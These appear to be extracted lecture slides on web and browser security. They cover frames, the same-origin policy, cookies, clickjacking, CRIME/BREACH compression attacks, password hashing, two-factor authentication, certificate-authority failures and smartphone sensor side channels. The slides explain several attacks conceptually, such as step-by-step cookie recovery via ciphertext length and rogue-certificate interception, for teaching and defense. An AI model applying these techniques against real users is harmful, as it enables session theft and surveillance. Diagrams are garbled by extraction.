See: http://developer.apple.com/internet/webcontent/iframe.html
Important Point: A web can maintain bi-directional
communication with browser (until user closes/quits)
29. Simple remote scripting example
<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
<script type="text/javascript">
window.parent.handleResponse()
</script>
server.html: another page on same server, could be server.php, etc
client.html: RPC by passing arguments to server.html in query string
RPC can be done silently in JavaScript, passing and receiving arguments
31. Frame and iFrame
Window may contain frames from different sources
§ Frame: rigid division as part of frameset
§ iFrame: floating inline frame
iFrame example
Why use frames?
§ Delegate screen area to content from another source
§ Browser provides isolation based on frames
§ Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>
33. Analogy
Operating system
Primitives
§ System calls
§ Processes
§ Disk
Principals: Users
§ Discretionary access control
Vulnerabilities
§ Buffer overflow
§ Root exploit
Web browser
Primitives
§ Document object model
§ Frames
§ Cookies / localStorage
Principals: “Origins”
§ Mandatory access control
Vulnerabilities
§ Cross-site scripting
§ Cross-site request forgery
§ Cache history attacks
§ …
34. Browser security mechanism
Each frame of a page has an origin
§ Origin = protocol://host:port
Frame can access its own origin
§ Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
A A
B
B
A
35. Components of browser security policy
Frame-Frame relationships
§ canScript(A,B)
› Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
§ canNavigate(A,B)
› Can Frame A change the origin of content for Frame B?
Frame-principal relationships
§ readCookie(A,S), writeCookie(A,S)
› Can Frame A read/write cookies from site S?
36. Library import excluded from SOP
<script src=https://seal.verisign.com/getseal?
host_name=a.com></script>
•Script has privileges of imported page, NOT source server.
•Can script other pages in this origin, load more scripts
•Same issues with other forms of importing
VeriSign
39. HTML5 Frame sandbox
Specify sandbox attribute of iframe
<iframe sandbox src="http://untrusted.site.net/content"></iframe>
Creates restricted frame
§ Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be
executed.
§ Forms are disabled. The hosted content is not allowed to post forms back to any target.
§ Scripts are disabled. JavaScript is disabled and will not execute.
§ Links to other browsing contexts are disabled. An anchor tag targeting different browser
levels will not execute.
§ Unique origin treatment. All content is treated under a unique origin. The content is not
able to traverse the DOM or read cookie information.
40. Optional attributes relax sandbox
allow-forms
§ Allows embedded page to post back using a form submit within the frame.
allow-scripts
§ Enables JavaScript
allow-same-origin
§ Can access DOM of another frame, subject to same-origin policy
§ Only useful with allow-scripts
§ But be careful: parent frame can manipulate sandbox attributes and remove further
restrictions.
allow-top-navigation
§ Allow content to navigate entire tab/window
allow-popups
§ Allow embedded content to open new popup windows
49. Fragment Identifier Messaging
Send information by navigating a frame
§ http://gadget.com/#hello
Navigating to fragment doesn’t reload frame
§ No network traffic, but frame can read its fragment
Not a secure channel
§ Confidentiality
§ Integrity
§ Authentication
ü
û
ü
50. window.postMessage
API for inter-frame communication
§ Supported in current browsers
§ A network-like channel between frames
Add a contact
Share contacts
51. window.addEventListener("message", function (e) {
if (e.origin == "http://a.com") {
... e.data ... }
}, false);
frames[0].postMessage("Attack at dawn!",
"http://b.com/");
postMessage syntax
Facebook
Anecdote
Attack at dawn!
53. Two-way communication
A method call is associated with a response
Can build this on top of postMessage
§ Messenger: Each time you call a method in the iframe, you pass a reply function that is
called with the results of that method call.
54. jQuery postMessage plugin
Wraps the postMessage API and simplifies its usage.
Works in browsers that do not support postMessage method by using fragment
navigation (hash portion of the url)
55. Network communication
Cross-origin network requests
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Site B
Site A
Site A context Site B context
57. Cookies
Used to store state on user’s machine
Browser
Server
POST …
HTTP Header:
Set-cookie: NAME=VALUE ;
domain = (who can read) ;
expires = (when expires) ;
secure = (only over SSL)
Browser
Server
GET …
Cookie: NAME = VALUE
HTTP is stateless protocol; cookies add state
If expires=NULL:
this session only
58. Cookie authentication
Browser Web Server Auth server
POST login.cgi
Username & pwd Validate user
auth=val
Store val
Set-cookie: auth=val
GET restricted.html
Cookie: auth=val restricted.html
auth=val
YES/NO
If YES,
restricted.html
Check val
59. Cookie Security Policy
Uses:
§ User authentication
§ Personalization
§ User tracking: e.g. Doubleclick (3rd party cookies)
Origin is the tuple <domain, path>
§ Can set cookies valid across a domain suffix
§ Complicated and implementation-specific rules for selecting
cookie values, when many cookies apply
60. Secure Cookies
Browser
Server
GET …
HTTP Header:
Set-cookie: NAME=VALUE ;
Secure=true
• Provides confidentiality against network attacker
• Browser will only send cookie back over HTTPS
• … but no integrity
• Can rewrite secure cookies over HTTP
Þ network attacker can rewrite secure cookies
Þ can log user into attacker’s account
61. httpOnly Cookies
Browser
Server
GET …
HTTP Header:
Set-cookie: NAME=VALUE ;
httpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
62. HTML5 Local Storage
Based on named key/value pairs
§ Store data based on a named key (a string)
§ Retrieve that data with the same key
§ Data can be any type supported by JavaScript
› Including strings, Booleans, integers, floats
› But data is actually stored as a string
Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the
expected JavaScript datatype
Some browsers also implement Web SQL Database
§ Other forms of local storage would also be useful
63. var data = localStorage.getItem(1);
localStorage.setItem(1,'This is a sample sentence');
Example
Save a sentence in Local Storage :
Retrieve it:
Local Storage supports length, removeItem() and clear().
64. Security issues
Storage per origin
§ Origin is: scheme, host, port
Could be accessed by user with local access (varies by browser)
Can be accessed by JavaScript in page
§ no httpOnly so vulnerable to XSS attacks
XSS attacks can read local storage
§ Do not store sensitive information
XSS attacks can write local storage
§ Do not trust data read from local storage
67. Sandbox techniques
Static analysis
§ No loads or stores permitted outside the data sandbox
› Enforced by operating system protection mechanisms
§ No unsafe instructions
› Examples: syscall, int, and lds.
§ Control flow integrity
› All direct, indirect branches target a safe instruction
Dynamic monitoring
§ Native Client runtime mediates system calls
69. Attacker overlays multiple transparent or opaque frames to
trick a user into clicking on a button or link on another page
Clicks meant for the visible page are hijacked and routed to
another, invisible page
Clickjacking
slide 69
70. Clickjacking in the Wild
Google search for “clickjacking” returns 342,000 results… this is not a hypothetical
threat!
Summer 2010: Facebook worm superimposes an invisible iframe over the entire page
that links back to the victim's Facebook page
§ If victim is logged in, automatically recommends link to new friends as soon as the
page is clicked on
Many clickjacking attacks against Twitter
§ Users send out tweets against their will
slide 70
74. Frame Busting
Goal: prevent web page from loading in a frame
§ example: opening login page in a frame will display
correct passmark image
Frame busting:
if (top != self)
top.location.href = location.href
75. Better Frame Busting
Problem: Javascript OnUnload event
Try this instead:
<body onUnload="javascript: cause_an_abort;)">
if (top != self)
top.location.href = location.href
else { … code of page here …}
78. Topics for this section
TLS attacks and defenses:
Compression attacks: CRIME and BREACH, TLS 1.3
Password breaches and 2nd factor authentication
Certificate Authorities: compromises, Lets encrypt, universal TLS
New hardware security support: Intel SGX
Sensor abuse on mobile phones
80. Review: TLS 1.2
browser server
SK
client-hello
server-hello + server-cert (PK)
key exchange (several options)
Finished
cert
client-key-exchange: E(PK, k)
rand. k
k
HTTP data encrypted with KDF(k)
most common: server authentication only
from CA
81. Review: TLS record encryption (original design)
browser server
k k
plaintext HTTP data
16KB records
plaintext integrity tag (MAC)
encrypt
k
hdr ciphertext
encryption method is called MAC-then-encrypt :
the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … )
why?
82. TLS 1.3: a new version of TLS (2017)
Record encryption:
• mandatory method: AES128-GCM
fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte
• On weaker processors: CHACHA20_POLY1305
fast in software
Both methods provide authenticated encryption
83. TLS 1.3: a new version of TLS (2017)
Session setup:
• Forward secrecy required (non-forward secure method is deprecated)
• Zero round-trip setup option:
client can send encrypted data on first flow (after client-hello)
• Server certificate is encrypted (previously, sent in the clear)
stronger privacy when server has multiple certificates
• Initiate TLS session from a pre-shared secret, if one exists
more general than session-resume in TLS 1.2
85. Compression and Encryption
Strong desire to combine compression and encryption
How?
Option 1: first encrypt and then compress
Does not work … ciphertext looks like a random string
86. Compression and Encryption
Option 2: first compress and then encrypt
Used in many Internet protocols (TLS, HTTPS, QUIC, …)
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Recall in TLS: 16KB records
Support for compression before encryption
87. Trouble … [Kelsey’02]
Compress-then-encrypt reveals information:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
POST /bank.com/buy?id=goog
Cookie: uid=JhPL8g69684rksfsdg
Second message compresses better than first:
network observer can distinguish the two messages!
88. Even worse: the CRIME attack [RD’2012]
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Javascript
Goal: steal user’s bank cookie
Javascript can issue requests to Bank,
but cannot read Cookie value
(simplified)
89. Observe ciphertext size
POST /bank.com/buy?uid=A11111…
Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com
16KB
Even worse: the CRIME attack [RD’2012]
(simplified)
90. Observe ciphertext size
POST /bank.com/buy?uid=B11111…
Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com
16KB
Even worse: the CRIME attack [RD’2012]
(simplified)
91. POST /bank.com/buy?uid=J11111…
Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com
16KB
Ciphertext size is slightly shorter
⇒ first character of Cookie is “J”
Even worse: the CRIME attack [RD’2012]
(simplified)
93. POST /bank.com/buy?uid=Jh1111…
Cookie: uid=Jh PL8g69684rksfsdg
Host: bank.com
16KB
Ciphertext size is slightly shorter
⇒ 2nd character of Cookie is “h”
Even worse: the CRIME attack [RD’2012]
(simplified)
94. POST /bank.com/buy?uid=Jh1111…
Cookie: uid=Jh PL8g69684rksfsdg
Host: bank.com
16KB
Recover entire cookie after
256 × (len of Cookie) attempts
Takes several seconds (simplified)
Even worse: the CRIME attack [RD’2012]
(simplified)
95. What to do?
The problem:
Observed ciphertext length reveals compression amount ⇒
reveals plaintext info … no good solution
Non-defense: add a random length pad to ciphertext
First defense: compression disabled in TLS (and others, e.g., SPDY)
Problem: compression also done in HTTP layer
⇒ BREACH attack [PHG’13]
… much harder to disable HTTP compression in practice
96. What to do? [PHG’13]
Many web sites are impacted …
A proposed defense:
› Application layer “tags” sensitive data fields in
HTTP requests and responses (cookies, PII, etc.)
› HTTP-level compression only applied to non-sensitive fields
… but not easy to implement
98. A (small) sample of password breaches
2012: Linked-in: 6 million passwords (hashed, unsalted)
2013:
Twitter: 250,000 passwords (hashed, salted)
Evernote: 50 million records: usernames, emails, hashed passwords
Adobe: 38 million records
email addrs., password hints, and encrypted passwords
2015:
LastPass: stolen email addr., hashed master passwords (and salts)
(server-side compromise)
99. Weak password choice
Users frequently choose weak passwords: (adobe list, 2013)
A common occurrence
Example: the Rockyou password list, 2009 (6 most common pwds)
123456, 12345, Password, iloveyou, princess, abc123
List of 360,000,000 words covers about 25% of user passwords
Password: 123456 123456789 password adobe123 12345678 qwerty 1234567
Fraction
of users:
5% 1.1% 0.9% 0.5% 0.5% 0.5% 0.3%
Total: 8.8%
100. How to store passwords
First rule of password storage: never store passwords in the clear !
pwA
Alice SA H(pwA , SA)
Bob SB H(pwB , SB)
… … …
hash
salt
id
To validate a given password server checks:
H(pwA , SA) ≟ StoredHash(Alice)
Alice
password database
101. How to hash?
Linked-in: SHA-1 hashed (unsalted) passwords
⇒ 6 days, 90% of pwds. recovered by exhaustive search
The problem: SHA-1 is too fast …
attacker can try all words in dictionary
To hash passwords:
• Use a keyed hash function (e.g., HMAC) where key stored in HSM
• In addition: use a slow, space-hard function
102. How to hash?
PBKDF2, bcrypt: slow hash functions
• Slowness by “iterating” a crypto hash function like SHA256
• Parameterized number of iterations (e.g., set for 1000 evals/sec)
Problem: custom hardware (e.g., GPU) can evaluate
hash function much faster than a commodity CPU
⇒ attacker can do dictionary attack much faster
than 1000 evals/sec.
103. Why is custom hardware faster?
only small part of CPU
used to hash
custom hardware
for Bitcoin mining ($1,695)
Antminer S7 5.06TH/s
Intel Skylake
0
1000
2000
3000
4000
5000
6000
Intel x86 Antminer
93
5060
50x
6 mill
2 mill
4 mill
5 mill
3 mill
1 mill
0
104. How to hash?
Scrypt: a slow hash function AND need lots of memory to evaluate
⇒ custom hardware not much faster than commodity CPU
Problem: memory access pattern depends on input password
⇒ local attacker can learn memory access pattern for user’s pwd
⇒ eliminates need for memory in an offline dictionary attack
Is there a space-hard function where time is independent of pwd?
• Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
105. Strengthening User Authentication
One option: biometrics:
Fingerprints, retina, facial recognition, …
Benefit: hard to forget
Problems:
Biometrics are not generally secret
Cannot be changed, unlike passwords
Þ Should primarily be used as a second factor authentication note: CCC’13
106. 2nd factor OTP authentication
Setup:
Choose random key k
On device and server: sk = (k,0)
Identification:
user server
r0 ¬ HMAC(k,0)
(k,0) (k,0)
yes iff
r = HMAC(k,0)
r1 ¬ HMAC(k,1)
(k,1) (k,1)
often, time-based updates
107. Google authenticator
6-digit timed one-time passwords (TOTP) [RFC 6238]
Wide web-site adoption: Gmail, Dropbox, WordPress, …
› Open study: 6.4% Gmail user adoption [EuroSec 2015]
To enable TOTP for a user: web site presents QR code with
embedded data: otpauth://totp/Example:alice@dropbox.com?
secret=JBSWY3DPEHPK3PXP & issuer=Example
(Subsequent user logins require user to present TOTP)
Danger: password reset upon user lockout
108.
109. Server compromise exposes secrets
March 2011:
RSA announced servers attacked, secret keys stolen
⇒ enabled SecurID user impersonation
Can we do better? Answer: Yes!
110. Duo (also FIDO U2F )
Signature-based challenge response:
sk
Alice pkA
Bob pkB
… …
pub-key
id
user database
login page
pwd
2FA challenge: m
Response: sign(sk, m)
data
verify
confirm
No secrets on server, simple user experience
112. Certificate Issuance Woes
Wrong issuance:
2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail
2013: TurkTrust issued cert. for gmail.com (discovered by pinning)
2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs
for Google and Yahoo! domains
Result: (1) India CCA revoked NIC’s intermediate certificate
(2) Chrome restricts India CCA root to only seven Indian domains
2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google
domains
Result: current CNNIC root no longer recognized by Chrome
⇒ enables eavesdropping w/o a warning on user’s session
113. Man in the middle attack using rogue cert
Attacker proxies data between user and bank.
Sees all traffic and can modify data at will.
bank
attacker
ClientHello ClientHello
BankCert
BadguyCert
ServerCert (Bank)
ServerCert (rogue)
GET https://bank.com
SSL key exchange SSL key exchange
k1 k1 k2 k2
HTTP data enc with k1 HTTP data enc with k2
(cert for Bank by a valid CA)
114. What to do? (many good ideas)
HPKP: HTTP public-key pinning
§ HTTP header that lets a site declare CAs that can sign its cert
Public-Key-Pins: pin-
sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs=";
§ on subsequent HTTPS, browser rejects certs issued by other CAs
§ TOFU: Trust on First Use
Certificate Transparency (CT): [LL’12]
§ idea: CA’s must advertise a log of all certs. they issued
§ Browser will only use a cert if it is on the CT log
• Efficient implementation using Merkle hash trees
• Companies can scan logs to look for invalid issuance
115. A new CA: Let’s encrypt (letsencrypt.org)
A new open Certificate Authority: free certs
• Provisioning via an automated agent running on web server
Step 1: install agent on web server
Step 2: agent proves domain ownership (e.g. bank.com) by
DNS record under bank.com or page at fixed URI at bank.com
and send Certificate Signing Request (CSR) to CA
Step 3: Let’s encrypt CA checks domain ownership
if valid, issue cert and sends cert to agent
Step 4: agent installs cert on Web server … done
2016: 800K certs issued
117. no user
permission
required
Sensors on smart phones
Microphone
Camera
GPS
Light sensor
Compass
MEMS Gyroscope / accelerometer
Power meter
Barometer
Heart rate / oximeter (on smart watches)
All have a specific function
Can they be abused ??
118. Example 1: fingerprinting
Imperfections in camera sensor can be used to link pictures taken by same phone
[LG’06]
Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14]
§ App. can tell if it has been previously installed on device
app
device-id
119. Example 2: Gyrophone [MBN’14]
Phone gyroscope: measures vibrations (used for games)
Trouble:
› Gyroscope picks up air vibrations (a.k.a speech)
› Sample rate (apps.): 200Hz
› Machine learning ⇒ can recognize some speech
120. Example 3: Power usage sensor
Modern phones measure power drained from battery
Enables apps to optimize power use
Repeatedly read:
/sys/class/power_supply/battery/voltage_now
/sys/class/power_supply/battery/current_now
Unrestricted access.
Can this be abused?
121. Example 3: Power usage sensor
Can this be abused? [MBSN’15]
Observation: power used by radio depends on
distance and obstacles to cell tower
122. So what?
Our work: [MBSN’15]
power readings + machine learning ⇒ GPS
Why? Routes in a city have unique power fingerprints
Three goals:
1. identify route car is taking among a known set of routes
2. identify car’s location along a known route
3. identify car’s route based on a database of
pre-measured short segments
✓
✓
✓
123. Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
124. Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
125. Lessons
Sensors can have unintended consequences
There is risk in giving apps direct access to sensors
Prevention:
• Always require permissions to access sensors
• Reduce data from sensors to min needed for utility
or only provide abstract view of sensor data
126. Final note: limitations of air gaps
A machine holds sensitive date and is isolated from network
• If it gets infected, can the malware exfiltrate data?
Answer: yes! [Usenix Sec 2015]
• Mimic GSM signals using data bus
• Use x86 instruction: MOVNTDQ m128, xmm
• Effective for 60 feet